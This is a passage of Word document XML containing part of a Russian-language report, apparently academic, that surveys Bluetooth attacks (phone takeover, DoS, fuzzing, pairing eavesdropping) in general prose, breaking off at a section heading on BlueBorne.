        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>вид</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>дает</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>возможность</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>получить</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>полный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>контроль</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>над</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефоном</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>выполнять</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>различные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>команды</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>нем,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>такие</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>как:</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>отправка</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>чтение</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>SMS-сообщений,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефонной</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>книге,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>установка</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>переадресаций,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>набор</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>произвольного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>номера</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>других</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>функций.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Атаке</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>подвержен</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>любой</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>мобильный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>телефон,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>имеющий</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>поддержку</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00B66422" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:r w:rsidRPr="00731752">
        <w:t>Как</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>другие</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>беспроводные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>технологии,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>подвержен</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атак.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Они</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>блокируют</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>интерфейс</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>делают</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>его</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>не</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пригодным</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использования,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>том</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>числе</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>разряжают</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>батарею. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00B66422" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B66422">
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00731752" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:r w:rsidRPr="00731752">
        <w:t>Атаки</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>состоят</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>посылки</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>искаженного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>нестандартного</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>пакета</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>данных</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>радиоустройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>наблюдают,как</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00731752">
        <w:t xml:space="preserve"> устройство реагирует.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>Если</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>операции</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>замедляется</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>останавливаются</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>этих</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атак,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>существует</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>серьезная</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>потенциальная</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>уязвимость стеке</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>протокола.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00B66422" w:rsidRDefault="00731752" w:rsidP="00B66422">
      <w:pPr>
        <w:pStyle w:val="af0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Pairing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B66422">
        <w:rPr>
          <w:rStyle w:val="af1"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Eavesdropping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00731752" w:rsidRPr="00880DF7" w:rsidRDefault="00731752" w:rsidP="00880DF7">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00731752">
        <w:t>Сопряжение</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>2.0</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>ранее,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>также</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00731752">
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>LE</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>(4.0) ус</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>ройств</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>использованием</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>PIN</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>кода</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>подвержены</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>данному</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>типу</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>атак.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00880DF7" w:rsidRPr="00731752">
        <w:t>Успешное прослушивание</w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>собирать</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>все</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>парные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>кадры,</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>таким</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>образом</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>можно</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>определить</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>секретный</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>ключ</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>позволяет</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>делать</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>расшифровку</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731752">
        <w:t>данных.</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7" w:rsidRPr="00880DF7">
        <w:t>[29][30]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRDefault="00DC0109" w:rsidP="00012BBF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc503991009"/>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012BBF" w:rsidRPr="00012BBF">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>BlueBorne</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00012BBF" w:rsidRPr="00012BBF" w:rsidRDefault="00012BBF" w:rsidP="00012BBF">
      <w:pPr>
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012BBF">
        <w:rPr>
